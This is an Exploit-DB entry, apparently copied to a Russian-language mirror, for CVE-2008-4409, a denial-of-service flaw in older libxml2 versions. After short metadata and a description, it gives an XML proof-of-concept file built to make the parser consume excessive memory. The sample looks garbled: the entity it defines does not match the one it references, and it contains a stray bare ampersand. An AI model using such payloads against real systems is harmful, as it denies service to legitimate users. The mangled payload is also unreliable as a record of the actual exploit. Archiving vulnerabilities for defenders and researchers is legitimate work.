- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32454
- Проверка EDB
-
- Пройдено
- Автор
- CHRISTIAN WEISKE
- Тип уязвимости
- DOS
- Платформа
- UNIX
- CVE
- cve-2008-4409
- Дата публикации
- 2008-10-02
XML:
source: https://www.securityfocus.com/bid/31555/info
The libxml2 library is prone to a denial-of-service vulnerability caused by an error when handling files using entities in entity definitions.
An attacker can exploit this issue to cause the library to consume an excessive amount of memory, denying service to legitimate users.
The issue affects libxml2 2.7 prior to 2.7.2.
XML file:
<?xml version='1.0' ?>
<!DOCTYPE test [
<!ENTITY ampproblem '&'>
]>
<t a="&problem;">a</t>- Источник
- www.exploit-db.com
